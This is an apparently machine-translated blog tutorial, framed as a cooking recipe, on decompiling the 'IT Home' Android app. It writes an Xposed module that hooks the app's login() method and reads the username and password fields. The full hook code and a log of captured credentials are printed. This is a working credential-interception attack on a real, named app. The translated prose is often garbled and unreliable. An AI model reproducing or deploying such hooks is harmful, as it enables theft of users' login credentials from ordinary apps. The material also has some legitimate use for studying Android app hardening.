An article on " Android reverse of Fun Xposed module to hijack an example login (Demo papers) ," wrote and directed the hijacking of a log Xposed module, how full of sorrow, if only to break his own APP that, after all the market app on all through a variety of confusion, signatures, and other security reinforcement treatment, to hijack someone else's app easier said than done. In view of this, to help improve children's shoes through the actual learning a new height, then we continue to do things that begin to crack someone's app.
Preparation of food
| Foodstuff | version | link |
|---|---|---|
| "IT House" Android end | v6.75 | click to download |
"IT Home" app (hereinafter referred to as: app) is one of my favorite homemade app, UI design is very good, but this article to bring it opened dishes, emmm ...
择洗 food
The downloaded app peeled, washed and waiting for the pot. Excuse me? ? ? I was writing recipes do?
In fact, the application is made shelling and decompilation. By the way, app decompile this one is not the focus of this article involves more complex and process knowledge, simply ignore this process, focusing on the analysis and Xposed modules written in reverse.
Thankfully, this app is not even packers, I direct to decompile.
MD, is a period of hydrologic ...
Stir the pot
Reverse wave analysis, more content, if cause discomfort, but also watching ~ ~ ~
As to hijack log in, it would have to try to find the login interface-related code, we find a breakthrough from the app's UI interface, login screen viewed from below:
Select "Forgot Password?" (The word usually only appear in the login screen, while others such as "password" in the keyword registration, forgotten passwords and other interfaces are likely to find difficult) as the search keyword wave decompile code as follows:
Ah ha, are concentrated in the "activity_user_center" series of documents, the login screen layout file is no doubt. Android development without making children's shoes might look ignorant force, which is so many documents ah? In fact, they are referenced by the same interface, but for different versions of the system, do a theme corresponding adapter file, you can choose one.
Next, the keyword "activity_user_center" wave of search, view layout files which are referenced by code interface:
Find the id of the resource layout file (java code is expressed as: R.layout.activity_user_center), a value of "0x7f04009f", and then search for its wave:
OK, this is the object code interface. Open UserCenterActivity.smali (corresponding to the development as: UserCenterActivity.java) file, facing the login screen picture above to find the "mail / phone number" and "Password" edit box control and the login button controls:
Coincidentally, just write their code together, easy to find, understand smali grammar does not matter, I'm here to translate into java code:
@butterknife.BindView(a=0x7f110508)
android.widget.Button btn_user_login;
@butterknife.BindView(a=0x7f110507)
android.widget.EditText et_user_password;
@butterknife.BindView(a=0x7f110504)
android.widget.EditText et_user_username;
The amount is not familiar?
Ah ha, then keep looking btn_user_login login button click event (ie, the user's logon trigger event), find a circle did not even find. Assi ... hell.
By the way, it took ButterKnife, will not register a click event by btn_user_login resource id? Ah, then copy the resource id above java code "0x7f110508" were stifling search operation:
Really found a simple roughly translated as follows:
@OnClick(a={0x7f110508})
public void login() {
String v0 = et_user_username.getText().toString();
String v1 = et_user_password.getText().toString();
if ((!TextUtils.isEmpty(v0) && (!TextUtils.isEmpty(v1))) {
......
}
......
}
OK, find the method is to find a method needs to hook the entrance. Hook line and prepare the code ...
Add seasonings
HandleLoadPackage modification method in the above item HookLogin XposedDemo categories:
public void handleLoadPackage(XC_LoadPackage.LoadPackageParam lpparam) {
if (lpparam == null) {
return;
}
Log.e(TAG, "Load app packageName:" + lpparam.packageName);
/**
* 过滤非目标应用
*/
if (!"com.ruanmei.ithome".equals(lpparam.packageName)) {
return;
}
//固定格式
XposedHelpers.findAndHookMethod(
"com.ruanmei.ithome.ui.UserCenterActivity", // 需要hook的包名+类名
lpparam.classLoader, // 类加载器,固定这么写就行了
"login", // 需要hook的方法名,login()
// Hook回调
new XC_MethodHook() {
@Override
/**
* 指定的方法被hook前执行下面的方法
*/
protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
Log.e(TAG, "劫持开始了↓↓↓↓↓↓");
}
/**
* 指定的方法被hook后执行下面的方法
*/
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
Class o = param.thisObject.getClass();
Field.setAccessible(o.getDeclaredFields(), true);
Field usernameField = findField(o, "et_user_username");
Field passwordField = findField(o, "et_user_password");
EditText et_user_username = (EditText) usernameField.get(param.thisObject);
EditText et_user_password = (EditText) passwordField.get(param.thisObject);
String username = et_user_username.getText().toString();
String password = et_user_password.getText().toString();
Log.e(TAG, "用户名: " + username + " , 密码 : " + password);
Log.e(TAG, "劫持结束了↑↑↑↑↑↑");
}
}
);
}
Our code of conduct "login ()" method in UserCenterActivity hook, obtain a user name and password and log prints do, so that when the user clicks the login button you can record a user name and password.
Pan on the plate
For HookLoginModule recompiled apk installed to the phone and restart (if not, please refer to the previous article).
Taste dishes taste
Open the app to verify Hook Code:
Presentation charts do log-in operation, under log log posted here:
2019-05-11 23:23:52.932 27555-27555/? E/HookLogin: 劫持开始了↓↓↓↓↓↓
2019-05-11 23:23:53.005 27555-27555/? E/HookLogin: 用户名: 95***[email protected] , 密码 : ******
2019-05-11 23:23:53.005 27555-27555/? E/HookLogin: 劫持结束了↑↑↑↑↑↑
To successfully obtain a user name and password (relate to privacy and harmonious Kazakhstan).
Serving
So delicious! Can serve (zhuang bi), the actual articles is over!
XposedDemo Download: https://github.com/ausboyue/XposedDemo